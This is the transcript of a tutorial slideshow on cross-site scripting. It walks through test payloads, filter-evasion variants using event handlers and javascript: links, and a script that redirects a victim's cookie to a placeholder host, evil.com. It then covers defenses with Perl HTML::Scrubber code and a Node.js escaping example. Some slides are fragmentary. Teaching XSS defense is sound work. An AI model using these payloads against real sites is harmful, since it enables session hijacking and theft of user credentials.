Cross Site Scripting Augusta For Matrix Session

By: Augusta http://www.steve.org.uk/Hacks/XSS/index.html

Upload: abhishek-kumar

Post on 12-Nov-2014


DESCRIPTION

This slide show explains XSS attacks, their various levels, and ways to protect against them.

TRANSCRIPT

Page 1: Cross Site Scripting Augusta For Matrix Session

By :

Augusta

http://www.steve.org.uk/Hacks/XSS/index.html

Page 2

XSS attacks (cross site scripting) almost always focus upon sites which use cookies for storing your username and password.

XSS is on the Open Web Application Security Project's (OWASP) top 10 list of exploited vulnerabilities.

Page 3

The aim is to steal the cookie of a user of the site. "Steal" in this context means get a copy of it, rather than removing the original.

The first test is to submit the following in a form field and see whether it runs:

<script> alert(document.cookie); </script>

Page 4

Basic filtered input

<script> and </script> are filtered (deleted).

Page 5

They found other ways to avoid dependence on the <script> tag. Other ways of calling JavaScript:

<a href="javascript:alert(document.cookie);">Click me</a>

<a href="advanced.html" onClick="alert(document.cookie)">test</a>

Page 6

I can run script, what now?

You don't want to have people viewing the popup boxes all day! You want to do something more useful?

Page 7

Redirect the user. This would allow you to record the user's cookie for later (ab)use:

<script> document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie; </script>

This would redirect the user to a CGI script called 'blah.cgi' on a website 'evil.com'. The CGI script gets given the cookie of the innocent user as a parameter called 'cookie'.

Page 8

To the next level

Using the onClick handler you have to rely upon the user clicking on a link you have placed. If the user will not click it, what then?

Page 9

Use another method: onMouseOver. This allows you to have code executed when the mouse pointer merely moves over a link.

Page 10

<a href="whatnow.html" onMouseOver="alert(document.cookie);">Test</a>

Page 11

Best defense against XSS attacks??

1. Good filtering of input. If you allow users to send messages to each other, for example, you really must filter all input from the sender to make sure it's secure.

Page 12

Some sites will allow you to enter a URL, then they will display it as a clickable link such as:

<a href="URI">URI</a>

<a href="http://foocome" onMouseOver="alert(document.cookie)">http://foocome" onMouseOver="alert(document.cookie)</a>
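The link above shows the attribute-context break-out. What follows is an added example, not code from the slides or from the site they cite: a Node.js script with no dependencies, in which the function names and the sample inputs are constructed for illustration. It renders a user-supplied URL the naive way the slide shows, then the hardened way (HTML-escape both the attribute and the link text, and allow only http/https so that the javascript: hrefs from page 5 are refused as well).

```javascript
// Added example: rendering a user-supplied URL as a link, naive vs. hardened.
// Node.js, no dependencies; all names and sample inputs here are constructed.

// Naive rendering, exactly as the slide's <a href="URI">URI</a> template does.
function renderLinkNaive(uri) {
  return `<a href="${uri}">${uri}</a>`;
}

// Escape the characters that change meaning in HTML text or a quoted attribute.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Accept only http(s) URLs. WHATWG URL parsing normalises the scheme first, so
// "JaVaScRiPt:" or a leading tab/space does not get past the check. Returns
// the normalised href, or null when the input must not become a link.
function safeHref(uri) {
  let parsed;
  try {
    parsed = new URL(uri);
  } catch (e) {
    return null; // not a parseable absolute URL
  }
  return parsed.protocol === "http:" || parsed.protocol === "https:"
    ? parsed.href
    : null;
}

// Hardened rendering: scheme allowlist plus escaping of both contexts.
function renderLinkSafe(uri) {
  const href = safeHref(uri);
  if (href === null) {
    return escapeHtml(uri); // shown as plain text, never as a link
  }
  return `<a href="${escapeHtml(href)}">${escapeHtml(uri)}</a>`;
}

// Constructed attack strings: the slide's attribute break-out and a javascript: URL.
const BREAKOUT = 'http://foo.com" onMouseOver="alert(document.cookie)';
const JS_URL = "javascript:alert(document.cookie)";

console.log(renderLinkNaive(BREAKOUT)); // handler injected into the tag
console.log(renderLinkSafe(BREAKOUT));  // quotes escaped, no handler
console.log(renderLinkSafe(JS_URL));    // plain text, no link
```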

Page 13

2. Use HTML::Scrubber, a good Perl module for filtering all input. Read this:

http://search.cpan.org/~podmaster/HTML-Scrubber-0.08/Scrubber.pm

Page 14

Perl code

#!/usr/bin/perl -w
use HTML::Scrubber;
use strict;

# Sample input mixing a style block, a script block and a few ordinary tags.
my $html = q[
<style type="text/css"> BAD { background: #666; color: #666;} </style>
<script language="javascript"> alert("Hello, I am EVIL!"); </script>
<HR>
a => <a href=1>link </a>
br => <br>
b => <B> bold </B>
u => <U> UNDERLINE </U>
];

# Allow only these tags; any other tag (style, script, a, ...) is scrubbed.
my $scrubber = HTML::Scrubber->new( allow => [ qw[ p b i u hr br ] ] );

print $scrubber->scrub($html);

# Now deny those tags as well, so the second run leaves only the text.
$scrubber->deny( qw[ p b i u hr br ] );

print $scrubber->scrub($html);

Page 15

I wasn't satisfied with HTML::Sanitizer because it is based on HTML::TreeBuilder, so I thought I'd write something similar that works directly with HTML::Parser.

3. New W3C draft on Mozilla Firefox

4. MS patch :: crsscri

Page 16

Just another point of view!!! Is XSS bad or good?? Who are you to decide?? What about mash-ups like 99acre and Google Maps!!!

Page 17

Thank you so much. I am honored by your presence.